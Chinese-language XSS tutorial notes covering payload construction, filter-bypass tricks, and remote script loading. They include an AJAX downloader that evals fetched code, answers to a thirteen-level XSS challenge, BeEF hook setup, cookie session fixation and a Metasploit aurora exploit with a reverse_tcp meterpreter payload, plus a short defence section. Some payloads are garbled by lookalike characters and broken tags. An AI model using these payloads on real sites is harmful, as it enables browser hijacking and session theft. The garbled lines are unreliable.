一、XSS 的构造
1.1 利用[<>]构造 HTML/JS
可以利用[<>]构造 HTML 标签和]
1.2 伪协议
亦可以使用 JavaScript:伪协议的方式构造 XSS
在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功
提交参数[click me!] 点击超链接。即可触发 XSS
也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功
[<img src="javascript:alert(/XSS/)">]
1.3 产生自己的事件
事件驱动是一种比较经典的编程思想。在网页中会发生很多事件(比如鼠标移动,键盘输入
等),JS 可以对这些事件进行响应,所以我通过事件触发 JS 函数,进而触发 XSS。
事件种类:
Windows 事件
Form 事件
对 Windows 对象触发的事件
HTML 表单内的动作触发事件
键盘按键
Keyboard 事件
Mouse 事件
Media 事件
由鼠标或类似用户动作触发的事件
由多媒体触发的事件
如:[<img src=‘./simle.jpg’ οnmοuseοver=‘alert(/XSS/)’>]
这个标签会引入一个图片,然后鼠标悬停在图片上的时候,会触发 XSS 代码
单行文本框的键盘点击事件
input type=“text” οnkeydοwn=“alert(/XSS/)”> 当点击键盘任意一个按键时触发
input type=“text” οnkeyup=“alert(/XSS/)”>
input type=“button” οnclick=“alert(/XSS/)”>
img scr=‘./simle.jpg’ οnmοuseοver=‘alert(/XSS/)’>
img scr=‘#’ οnerrοr=‘alert(/XSS/)’>
1.4 利用 CSS 跨站(old)
方法比较古老,在这里就不做介绍
1.5 其他标签及手法(HTML5)
我们可以用其他标签触发 XSS。
[<svg οnlοad=“alert(/XSS/)”>]
[<input οnfοcus=alert(/XSS/) autofocus>]
focus:聚焦
二、XSS 的变形
我们可以构造的 XSS 代码进行各种变形,以绕过 XSS 过滤器的检测。变形方式主要有以下
几种。
2.1 大小写转换
可以将 payload 进行大小写转换,如下面两个例子
Img sRc=‘#’ Onerror=“alert(/XSS/)” />
a HrEF=“javaScript:alert(/XSS/)”>click me
注意:alert 不能改为大写,因为他是 JavaScript 语言,对大小写敏感。
2.2 引号的使用
HTML 语言中对引号的使用不敏感,但是某些过滤函数是“锱铢必较”。
img src="#" οnerrοr="alert(/XSS/)" />
img src='#' οnerrοr='alert(/XSS/)' />
img src=# οnerrοr=alert(/XSS/) />
2.3 [/]代替空格
可以利用左斜线代替空格
<Img/sRc=‘#’/Onerror=“alert(/XSS/)” />
2.4 回车
我们可以在一些位置添加 Tab(水平制表符)和回车符,来绕过关键字检测。
2.5 对标签属性值进行转码
可以对标签属性值进行转码,用来绕过过滤。对于编码如下:
经过简单编码之后的样子。
<A hREF="javascript:alert(/XSS/)">click me !</a>
另外,我们可以将以下字符插入到任意位置
Tab
换行
回车
可以将以下字符串插入到头部位置
SOH �
STX �
经过编码后的
A hReF="javas	c r ipt:alert(/xss/)">
click me!
2.6 拆分跨站
<script>z='alert'</script>
<script>z=z+'(/xss/)'</script>
<script>eval(z)</script>
2.7 双写绕过
对<script>做了一次过滤,过滤为空字符
<scr<script>ipt>
练习 xss 挑战
三、Shellcode 的调用
Shellcode 就是利用漏洞所执行的代码。
完整的 XSS 攻击,会将 Shellcode 存放在一定的地方,然后触发漏洞,调用 Shellcode。
3.1 远程调用 JS
可以将 JS 代码单独存放在一个 JS 文件中,然后通过 HTTP 协议远程加载该脚本。如:
<script src="http://172.16.132.138/XSS-TEST/normal/xss.js"></script>
这是比较常用的方式。xss.js 的内容如下
alert(‘xss.js’);
3.2 windows.location.hash
我们也可以使用 js 中的 windows.location.hash 方法获取浏览器 URL 地址栏的 XSS 代码。
windows.location.hash 会获取 URL 中#后面的内容,例如
[http://domain.com/index.php#GGG],windows.location.hash 的值是[#GGG].
所以我们可以如下构造代码
?submit=submit&&xsscode=<script>eval(location.hash.substr(1))</script>#alert(/This is
windows.location.hash/)],直接提交到测试页面 xss.php.
[
3.3 XSS Downloader
XSS 下载器就是将 XSS 代码写在网页中,然后通过 AJAX 技术,取得网页中的 XSS 代码。
在使用 XSS Downloader 之前需要一个我们自己的页面,xss_downloader.php,内容如下
常见的下载器代码`
<
script>
function XSS(){
if (window.XMLHttpRequest){
a=new XMLHttpRequest();
}
else if (window.ActiveXObject){
a=new ActiveXObject("Microsoft.XMLHTTP");
else{ return;}
}
a.open('get','http://192.168.1.200/XSS-TEST/normal/xss_downloader.php',false);
a.send();
b=a.reponseText;
eval(unescape(b.substring(b.indexOf('BOF|')+4,b.indexOf('|EOF'))))
}
XSS();
<
/script>
`
AJAX 技术会受到浏览器同源策略的限制,为了解决这个问题,我们需要在服务器端添加如
下内容。
<
?php
header('Access-Control-Allow-Origin:*');
header('Access-Control-Allow-Headers:Origin,X-Requested-With,Content-Type,Accept');
?>
3.4 备选存储技术
我们可以把 Shellcode 存储在客户端的本地域中,比如:HTTP Cookie、Flash 共享对象、
UserData、locationStorage 等。我们以 HTTP Cookie 为例子。
新建文件 cookie.php
点击 Cookie-XSS 验证,运行 JS 恶意代码。
xxs.php 文件
<
?php
echo $_COOKIE['name']
?>
四、XSS 通关挑战
第一关
第二关
“><img src=”#" οnerrοr=alert(/xss/)>
第三关
’ οnmοuseοver='alert(/xss/)
第四关
" οnmοuseοver="alert(/xss/)
第五关
">click me!
第六关
"Onmouseover="alert(/xss/)
">click me!
第七关
" oONnmouseover=“alert(/xss/)
第八关
javascRipt:alert(/xss/)
第九关
javascRipt:alert(‘http://’)
第十关
?t_sort=click me!” type=“button” οnclick=“alert(/xss/)
第十一关
Referer:click me!” type=“button” οnclick=“alert(/xss/)
第十二关
User-Agent: click me!” type=“button” οnclick="alert(/xss/)
第十三关
Cookie: user=click me!" type=“button” οnclick="alert(/xss/)
五、XSS 的防御
XSS Filter 的作用是过滤用户(客户端)提交的有害信息,从而达到防范 XSS 攻击的效果。
5.1 使用 XSS Filter
1、输入过滤
永远不要相信用户的输入是网站开发的基本常识,对于用户的输入一定要过滤,过滤,再
过滤。
⑴输入验证
简单的说,输入验证就是对用户提交的信息进行有效的验证,仅接受指定长度范围内的,
采用适当格式的内容提交,阻止或忽略除此之外的其他任何数据
输入是否包含合法字符
输入字符串是否超过最大长度限制
输入如果是数字,数字是否再指定范围之内
输入是否符合特殊格式要求,如 E-mail 地址、IP 地址等
⑵数据消毒
过滤和净化掉有害的输入
2、输出编码
HTML 编码主要用对应的 HTML 实体代替字符
3、黑白名单
不管采用输入过滤还是输出编码,都是针对数据信息进行黑|白名单方式的过滤
黑名单,非允许数据。
白名单,允许的数据。
5.2 防御 DOM-XSS
避免客户端文档的重写、重定向或其他敏感操作。
六、beef
XSS 神器
XSS 漏洞的利用平台
beef 的启动
工具目录
配置文件
/usr/share/beef-xss
config.yaml
启动 beef 工具的方法
1、beef-xss
2、/usr/share/beef-xss/beef
需要修改配置文件中的默认用户名和密码
vim /usr/share/beef-xss/config.yaml
Web 界面管理控制台
http://192.168.1.150:3000/ui/panel
Shellcode
http://192.168.1.150:3000/hook.js
测试页面(客户机访问该页面,将被劫持)
http://192.168.1.150:3000/demos/butcher/index.html
七、XSS 的利用
1、浏览器劫持
2、Cookie 窃取与欺骗–固定会话攻击
例如:得到了 cookie 信息 cookie=“username=admin”; userid=1
在浏览器的控制台输入如下命令
document.cookie=“username=admin”;
document.cookie=“userid=1”;
3、利用浏览器漏洞 getshell
用到 msfconsole 工具
msfconsole
use exploit/windows/browser/ms10_002_aurora
set payload window/meterpreter/reverse_tcp
set SRVHOST ip
set LHOST ip
exploit
样生成了一个地址,让浏览器访问该地址
exploit/windows/browser/ms10_002_aurora
exploit/windows/browser/ms12_063_aurora
xp
win7